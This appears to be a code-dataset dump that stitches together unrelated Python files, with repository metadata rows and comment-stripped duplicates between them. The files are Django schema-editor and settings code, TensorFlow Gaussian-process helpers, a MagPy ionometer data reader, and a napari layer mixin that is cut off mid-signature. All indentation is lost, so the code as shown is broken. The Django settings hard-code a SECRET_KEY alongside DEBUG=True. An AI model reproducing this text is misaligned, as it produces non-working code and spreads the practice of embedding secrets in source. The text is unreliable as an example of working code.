elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, six.memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character:
# value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
value = bytes(value)
hex_encoder = codecs.getencoder('hex_codec')
value_hex, _length = hex_encoder(value)
# Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
return "X'%s'" % value_hex.decode('ascii')
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _remake_table(self, model, create_fields=[], delete_fields=[], alter_fields=[], override_uniques=None,
override_indexes=None):
# Self-referential fields must be recreated rather than copied from
# the old model to ensure their remote_field.field_name doesn't refer
def is_self_referential(f):
return f.is_relation and f.remote_field.model is model
body = {
f.name: f.clone() if is_self_referential(f) else f
for f in model._meta.local_concrete_fields
}
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
rename_mapping = {}
restore_pk_field = None
if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
for field in create_fields:
body[field.name] = field
if not field.many_to_many and field.concrete:
mapping[field.column] = self.quote_value(
self.effective_default(field)
)
for (old_field, new_field) in alter_fields:
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
for field in delete_fields:
del body[field.name]
del mapping[field.column]
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.delete_model(field.remote_field.through)
apps = Apps()
body = copy.deepcopy(body)
if override_uniques is None:
override_uniques = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
if override_indexes is None:
override_indexes = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table,
'unique_together': override_uniques,
'index_together': override_indexes,
'apps': apps,
}
meta = type("Meta", tuple(), meta_contents)
body['Meta'] = meta
body['__module__'] = model.__module__
temp_model = type(model._meta.object_name, model.__bases__, body)
# context manager helps us avoid that situation.
@contextlib.contextmanager
def altered_table_name(model, temporary_table_name):
original_table_name = model._meta.db_table
model._meta.db_table = temporary_table_name
yield
model._meta.db_table = original_table_name
with altered_table_name(model, model._meta.db_table + "__old"):
# Rename the old table to make way for the new
self.alter_db_table(model, temp_model._meta.db_table, model._meta.db_table)
# Create a new table with the updated schema. We remove things
# from the deferred SQL that match our table name, too
self.deferred_sql = [x for x in self.deferred_sql if temp_model._meta.db_table not in x]
self.create_model(temp_model)
# Copy data from the old table into the new table
field_maps = list(mapping.items())
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(temp_model._meta.db_table),
', '.join(self.quote_name(x) for x, y in field_maps),
', '.join(y for x, y in field_maps),
self.quote_name(model._meta.db_table),
))
# Delete the old table
self.delete_model(model, handle_autom2m=False)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql)
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super(DatabaseSchemaEditor, self).delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
def add_field(self, model, field):
# Special-case implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.create_model(field.remote_field.through)
self._remake_table(model, create_fields=[field])
def remove_field(self, model, field):
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.remote_field.through._meta.auto_created:
self.delete_model(field.remote_field.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_fields=[field])
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
# Alter by remaking table
self._remake_table(model, alter_fields=[(old_field, new_field)])
def alter_index_together(self, model, old_index_together, new_index_together):
self._remake_table(model, override_indexes=new_index_together)
def alter_unique_together(self, model, old_unique_together, new_unique_together):
self._remake_table(model, override_uniques=new_unique_together)
def _alter_many_to_many(self, model, old_field, new_field, strict):
if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.remote_field.through,
alter_fields=[(
old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
)],
override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
)
return
self.create_model(new_field.remote_field.through)
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.remote_field.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.remote_field.through._meta.db_table),
))
self.delete_model(old_field.remote_field.through)
| true | true |
f7235867e61a5294df71164c7d23ca05c60ae529 | 3,448 | py | Python | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | 3 | 2017-09-28T21:02:58.000Z | 2018-02-06T17:58:48.000Z | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | null | null | null | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 James Hensman, alexggmatthews
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------
# Modification notice:
# This file was modified by Vincent ADAM
# ------------------------------------------
import tensorflow as tf
from settings import float_type
from quadrature import hermgauss
import numpy as np
def eye(N):
"""
An identitiy matrix
"""
return tf.diag(tf.ones(tf.stack([N, ]), dtype=float_type))
def variational_expectations( Fmu, Fvar, phi, num_gauss_hermite_points=20):
"""
Compute the expected value of a function phi, given a Gaussian
distribution for the input values.
if
q(f) = N(Fmu, Fvar)
then this method computes
\int phi(f) q(f) df.
Here, we implement a default Gauss-Hermite quadrature routine
"""
gh_x, gh_w = hermgauss(num_gauss_hermite_points)
gh_x = gh_x.reshape(1, -1)
gh_w = gh_w.reshape(-1, 1) / np.sqrt(np.pi)
shape = tf.shape(Fmu)
Fmu, Fvar = [tf.reshape(e, (-1, 1)) for e in (Fmu, Fvar)]
X = gh_x * tf.sqrt(2.0 * Fvar) + Fmu
logp = phi(X)
return tf.reshape(tf.matmul(logp, gh_w), shape)
import tensorflow as tf
def block_diagonal(matrices, dtype=tf.float32):
"""Constructs block-diagonal matrices from a list of batched 2D tensors.
Args:
matrices: A list of Tensors with shape [..., N_i, M_i] (i.e. a list of
matrices with the same batch dimension).
dtype: Data type to use. The Tensors in `matrices` must match this dtype.
Returns:
A matrix with the input matrices stacked along its main diagonal, having
shape [..., \sum_i N_i, \sum_i M_i].
"""
matrices = [tf.convert_to_tensor(matrix, dtype=dtype) for matrix in matrices]
blocked_rows = tf.Dimension(0)
blocked_cols = tf.Dimension(0)
batch_shape = tf.TensorShape(None)
for matrix in matrices:
full_matrix_shape = matrix.get_shape().with_rank_at_least(2)
batch_shape = batch_shape.merge_with(full_matrix_shape[:-2])
blocked_rows += full_matrix_shape[-2]
blocked_cols += full_matrix_shape[-1]
ret_columns_list = []
for matrix in matrices:
matrix_shape = tf.shape(matrix)
ret_columns_list.append(matrix_shape[-1])
ret_columns = tf.add_n(ret_columns_list)
row_blocks = []
current_column = 0
for matrix in matrices:
matrix_shape = tf.shape(matrix)
row_before_length = current_column
current_column += matrix_shape[-1]
row_after_length = ret_columns - current_column
row_blocks.append(tf.pad(
tensor=matrix,
paddings=tf.concat(
[tf.zeros([tf.rank(matrix) - 1, 2], dtype=tf.int32),
[(row_before_length, row_after_length)]],
axis=0)))
blocked = tf.concat(row_blocks, -2)
blocked.set_shape(batch_shape.concatenate((blocked_rows, blocked_cols)))
return blocked | 35.916667 | 81 | 0.660673 |
import tensorflow as tf
from settings import float_type
from quadrature import hermgauss
import numpy as np
def eye(N):
return tf.diag(tf.ones(tf.stack([N, ]), dtype=float_type))
def variational_expectations( Fmu, Fvar, phi, num_gauss_hermite_points=20):
gh_x, gh_w = hermgauss(num_gauss_hermite_points)
gh_x = gh_x.reshape(1, -1)
gh_w = gh_w.reshape(-1, 1) / np.sqrt(np.pi)
shape = tf.shape(Fmu)
Fmu, Fvar = [tf.reshape(e, (-1, 1)) for e in (Fmu, Fvar)]
X = gh_x * tf.sqrt(2.0 * Fvar) + Fmu
logp = phi(X)
return tf.reshape(tf.matmul(logp, gh_w), shape)
import tensorflow as tf
def block_diagonal(matrices, dtype=tf.float32):
matrices = [tf.convert_to_tensor(matrix, dtype=dtype) for matrix in matrices]
blocked_rows = tf.Dimension(0)
blocked_cols = tf.Dimension(0)
batch_shape = tf.TensorShape(None)
for matrix in matrices:
full_matrix_shape = matrix.get_shape().with_rank_at_least(2)
batch_shape = batch_shape.merge_with(full_matrix_shape[:-2])
blocked_rows += full_matrix_shape[-2]
blocked_cols += full_matrix_shape[-1]
ret_columns_list = []
for matrix in matrices:
matrix_shape = tf.shape(matrix)
ret_columns_list.append(matrix_shape[-1])
ret_columns = tf.add_n(ret_columns_list)
row_blocks = []
current_column = 0
for matrix in matrices:
matrix_shape = tf.shape(matrix)
row_before_length = current_column
current_column += matrix_shape[-1]
row_after_length = ret_columns - current_column
row_blocks.append(tf.pad(
tensor=matrix,
paddings=tf.concat(
[tf.zeros([tf.rank(matrix) - 1, 2], dtype=tf.int32),
[(row_before_length, row_after_length)]],
axis=0)))
blocked = tf.concat(row_blocks, -2)
blocked.set_shape(batch_shape.concatenate((blocked_rows, blocked_cols)))
return blocked | true | true |
f72359533daf16ad3957d382b5870b5ada9afd4f | 3,181 | py | Python | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | """
Django settings for innova_aula project.
Generated by 'django-admin startproject' using Django 2.2.19.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h8v7g_j4o+j6p_7u8j8iagb)&4kl8x3=-^ebx*aad&ru^0%__r'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'innova_aula.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'innova_aula.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
| 25.448 | 91 | 0.696636 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'h8v7g_j4o+j6p_7u8j8iagb)&4kl8x3=-^ebx*aad&ru^0%__r'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'innova_aula.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'innova_aula.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
| true | true |
f723596d8116a6fa92775f0eada8876662613e44 | 322 | py | Python | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2021-10-20 11:59
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('authy', '0004_auto_20211020_1442'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='url',
),
]
| 17.888889 | 45 | 0.586957 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('authy', '0004_auto_20211020_1442'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='url',
),
]
| true | true |
f7235a39a18cdf6f243e086a5d560268e5e7c2db | 75 | py | Python | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | array = [[0 for col in range(11)] for row in range(10)]
print(len(array)) | 18.75 | 55 | 0.653333 | array = [[0 for col in range(11)] for row in range(10)]
print(len(array)) | true | true |
f7235dff2f70aa306bec24c5d32adb94d9b98bd4 | 4,036 | py | Python | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 27 | 2016-02-29T21:46:40.000Z | 2022-02-11T23:43:20.000Z | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 105 | 2016-05-10T06:39:32.000Z | 2022-03-30T13:10:39.000Z | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 18 | 2016-09-13T06:57:48.000Z | 2022-02-09T09:49:14.000Z | """
MagPy
Input filter for IONOMETER data
Written by Roman Leonhardt December 2015
- contains test and read function, no write function
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import division
from io import open
from magpy.stream import *
def isIONO(filename):
"""
Checks whether a file is IM806 format.
"""
try:
temp = open(filename, 'rt').readline()
except:
return False
try:
if not temp.startswith('Messdaten IM806'):
if not temp.startswith('Date;Time;NegMin;'):
return False
except:
return False
return True
def readIONO(filename, headonly, **kwargs):
"""
Reading IONOMETER data to ndarray
Two different formats are supported:
1. Text export
2. FTP export
"""
debug = kwargs.get('debug')
stream = DataStream()
# Check whether header infromation is already present
headers = {}
array = [[] for key in KEYLIST]
#qFile= file( filename, "rb" )
qFile= open( filename, "rt", newline='' )
csvReader= csv.reader( qFile )
fileformat = 'ftpexp' # 'fileexp'
headers['SensorName'] = 'IM806'
headers['SensorSerialNum'] = '12IM0183'
lensum, lencnt = 0,0
for line in csvReader:
elem = line[0].split(';')
try:
if elem[0].startswith('Messdaten'):
el = elem[0].split()
headers['SensorName'] = el[1].strip()
headers['DataStandardVersion'] = el[-1].strip()
fileformat = 'fileexp'
elif elem[0].strip().startswith('IM806'):
el = elem[0].split()
headers['SensorSerialNum'] = el[-1].strip()
elif fileformat == 'fileexp' and elem[2] == 'Time':
for idx,el in enumerate(elem):
if idx > 2:
key = KEYLIST[idx-2]
headers['unit-col-'+key] = "N"
headers['col-'+key] = el.strip()
elif fileformat == 'ftpexp' and elem[1] == 'Time' and elem[2] == 'NegMin':
for idx,el in enumerate(elem):
if idx > 1:
key = KEYLIST[idx-1]
headers['unit-col-'+key] = "N"
headers['col-'+key] = el.strip()
elif fileformat == 'fileexp' and not headonly:
array[0].append(date2num(datetime.strptime(elem[1]+'T'+elem[2],'%d.%m.%YT%H:%M:%S')))
for idx,el in enumerate(elem):
if idx > 2:
ind = idx-2
array[ind].append(float(el))
elif fileformat == 'ftpexp' and not headonly:
array[0].append(date2num(datetime.strptime(elem[0]+'T'+elem[1],'%d.%m.%YT%H:%M:%S')))
# Typical problem of last line -> missing elements -> pad with nan values
lensum += len(elem)
lencnt += 1
avlen = int(np.round(lensum/lencnt))
if not len(elem) == avlen:
elem = (elem + ['nan'] * avlen)[:avlen]
for idx,el in enumerate(elem):
if idx > 1:
ind = idx-1
if el.strip() in [u'nan','']:
array[ind].append(np.nan)
elif ind > 7:
array[ind].append(float(el)/10.)
else:
array[ind].append(float(el))
except:
print ("Importing of IM806 data failed")
qFile.close()
# Add some Sensor specific header information
headers['SensorDescription'] = 'Ionometer IM806'
headers['SensorID'] = '{}_{}_0001'.format(headers.get('SensorName','None'),headers.get('SensorSerialNum','12345'))
array = [np.asarray(el) for el in array]
return DataStream([LineStruct()], headers, np.asarray(array))
| 37.027523 | 118 | 0.519822 | from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import division
from io import open
from magpy.stream import *
def isIONO(filename):
try:
temp = open(filename, 'rt').readline()
except:
return False
try:
if not temp.startswith('Messdaten IM806'):
if not temp.startswith('Date;Time;NegMin;'):
return False
except:
return False
return True
def readIONO(filename, headonly, **kwargs):
debug = kwargs.get('debug')
stream = DataStream()
headers = {}
array = [[] for key in KEYLIST]
qFile= open( filename, "rt", newline='' )
csvReader= csv.reader( qFile )
fileformat = 'ftpexp'
headers['SensorName'] = 'IM806'
headers['SensorSerialNum'] = '12IM0183'
lensum, lencnt = 0,0
for line in csvReader:
elem = line[0].split(';')
try:
if elem[0].startswith('Messdaten'):
el = elem[0].split()
headers['SensorName'] = el[1].strip()
headers['DataStandardVersion'] = el[-1].strip()
fileformat = 'fileexp'
elif elem[0].strip().startswith('IM806'):
el = elem[0].split()
headers['SensorSerialNum'] = el[-1].strip()
elif fileformat == 'fileexp' and elem[2] == 'Time':
for idx,el in enumerate(elem):
if idx > 2:
key = KEYLIST[idx-2]
headers['unit-col-'+key] = "N"
headers['col-'+key] = el.strip()
elif fileformat == 'ftpexp' and elem[1] == 'Time' and elem[2] == 'NegMin':
for idx,el in enumerate(elem):
if idx > 1:
key = KEYLIST[idx-1]
headers['unit-col-'+key] = "N"
headers['col-'+key] = el.strip()
elif fileformat == 'fileexp' and not headonly:
array[0].append(date2num(datetime.strptime(elem[1]+'T'+elem[2],'%d.%m.%YT%H:%M:%S')))
for idx,el in enumerate(elem):
if idx > 2:
ind = idx-2
array[ind].append(float(el))
elif fileformat == 'ftpexp' and not headonly:
array[0].append(date2num(datetime.strptime(elem[0]+'T'+elem[1],'%d.%m.%YT%H:%M:%S')))
lensum += len(elem)
lencnt += 1
avlen = int(np.round(lensum/lencnt))
if not len(elem) == avlen:
elem = (elem + ['nan'] * avlen)[:avlen]
for idx,el in enumerate(elem):
if idx > 1:
ind = idx-1
if el.strip() in [u'nan','']:
array[ind].append(np.nan)
elif ind > 7:
array[ind].append(float(el)/10.)
else:
array[ind].append(float(el))
except:
print ("Importing of IM806 data failed")
qFile.close()
headers['SensorDescription'] = 'Ionometer IM806'
headers['SensorID'] = '{}_{}_0001'.format(headers.get('SensorName','None'),headers.get('SensorSerialNum','12345'))
array = [np.asarray(el) for el in array]
return DataStream([LineStruct()], headers, np.asarray(array))
| true | true |
f7235eac6caeb862d193e06fce043ac5571e4468 | 28,932 | py | Python | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | import itertools
import numpy as np
from .. import layers
from ..utils import colormaps
from ..utils.misc import ensure_iterable, is_iterable
from ..utils import io
class AddLayersMixin:
"""A mixin that adds add_* methods for adding layers to the ViewerModel.
Each method corresponds to adding one or more layers to the viewer.
Methods that just add a single layer contain the keyword arguments and
copies of the documentation from that the layer. These are copied and
pasted instead of being autogenerated because IDEs like PyCharm parse the
source code for docs instead of pulling it up dynamically.
These methods are separated into a mixin to keep the ViewerModel class
easier to read and make these methods easier to maintain.
"""
def add_layer(self, layer):
"""Add a layer to the viewer.
Parameters
----------
layer : napari.layers.Layer
Layer to add.
"""
layer.events.select.connect(self._update_active_layer)
layer.events.deselect.connect(self._update_active_layer)
layer.events.status.connect(self._update_status)
layer.events.help.connect(self._update_help)
layer.events.interactive.connect(self._update_interactive)
layer.events.cursor.connect(self._update_cursor)
layer.events.cursor_size.connect(self._update_cursor_size)
layer.events.data.connect(self._on_layers_change)
layer.dims.events.ndisplay.connect(self._on_layers_change)
layer.dims.events.order.connect(self._on_layers_change)
layer.dims.events.range.connect(self._on_layers_change)
self.layers.append(layer)
self._update_layers(layers=[layer])
if len(self.layers) == 1:
self.reset_view()
def add_image(
self,
data=None,
*,
channel_axis=None,
rgb=None,
is_pyramid=None,
colormap=None,
contrast_limits=None,
gamma=1,
interpolation='nearest',
rendering='mip',
iso_threshold=0.5,
attenuation=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending=None,
visible=True,
path=None,
):
"""Add an image layer to the layers list.
Parameters
----------
data : array or list of array
Image data. Can be N dimensional. If the last dimension has length
3 or 4 can be interpreted as RGB or RGBA if rgb is `True`. If a
list and arrays are decreasing in shape then the data is treated as
an image pyramid.
channel_axis : int, optional
Axis to expand image along.
rgb : bool
Whether the image is rgb RGB or RGBA. If not specified by user and
the last dimension of the data has length 3 or 4 it will be set as
`True`. If `False` the image is interpreted as a luminance image.
is_pyramid : bool
Whether the data is an image pyramid or not. Pyramid data is
represented by a list of array like image data. If not specified by
the user and if the data is a list of arrays that decrease in shape
then it will be taken to be a pyramid. The first image in the list
should be the largest.
colormap : str, vispy.Color.Colormap, tuple, dict, list
Colormaps to use for luminance images. If a string must be the name
of a supported colormap from vispy or matplotlib. If a tuple the
first value must be a string to assign as a name to a colormap and
the second item must be a Colormap. If a dict the key must be a
string to assign as a name to a colormap and the value must be a
Colormap. If a list then must be same length as the axis that is
being expanded as channels, and each colormap is applied to each
new image layer.
contrast_limits : list (2,)
Color limits to be used for determining the colormap bounds for
luminance images. If not passed is calculated as the min and max of
the image. If list of lists then must be same length as the axis
that is being expanded and then each colormap is applied to each
image.
gamma : list, float
Gamma correction for determining colormap linearity. Defaults to 1.
If a list then must be same length as the axis that is being
expanded and then each entry in the list is applied to each image.
interpolation : str
Interpolation mode used by vispy. Must be one of our supported
modes.
rendering : str
Rendering mode used by vispy. Must be one of our supported
modes.
iso_threshold : float
Threshold for isosurface.
attenuation : float
Attenuation rate for attenuated maximum intensity projection.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
path : str or list of str
Path or list of paths to image data. Paths can be passed as strings
or `pathlib.Path` instances.
Returns
-------
layer : :class:`napari.layers.Image` or list
The newly-created image layer or list of image layers.
"""
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
if channel_axis is None:
if colormap is None:
colormap = 'gray'
if blending is None:
blending = 'translucent'
layer = layers.Image(
data,
rgb=rgb,
is_pyramid=is_pyramid,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
interpolation=interpolation,
rendering=rendering,
iso_threshold=iso_threshold,
attenuation=attenuation,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
else:
if is_pyramid:
n_channels = data[0].shape[channel_axis]
else:
n_channels = data.shape[channel_axis]
name = ensure_iterable(name)
if blending is None:
blending = 'additive'
if colormap is None:
if n_channels < 3:
colormap = colormaps.MAGENTA_GREEN
else:
colormap = itertools.cycle(colormaps.CYMRGB)
else:
colormap = ensure_iterable(colormap)
# If one pair of clim values is passed then need to iterate them to
# all layers.
if contrast_limits is not None and not is_iterable(
contrast_limits[0]
):
contrast_limits = itertools.repeat(contrast_limits)
else:
contrast_limits = ensure_iterable(contrast_limits)
gamma = ensure_iterable(gamma)
layer_list = []
zipped_args = zip(
range(n_channels), colormap, contrast_limits, gamma, name
)
for i, cmap, clims, _gamma, name in zipped_args:
if is_pyramid:
image = [
np.take(data[j], i, axis=channel_axis)
for j in range(len(data))
]
else:
image = np.take(data, i, axis=channel_axis)
layer = layers.Image(
image,
rgb=rgb,
colormap=cmap,
contrast_limits=clims,
gamma=_gamma,
interpolation=interpolation,
rendering=rendering,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
layer_list.append(layer)
return layer_list
def add_points(
self,
data=None,
*,
properties=None,
symbol='o',
size=10,
edge_width=1,
edge_color='black',
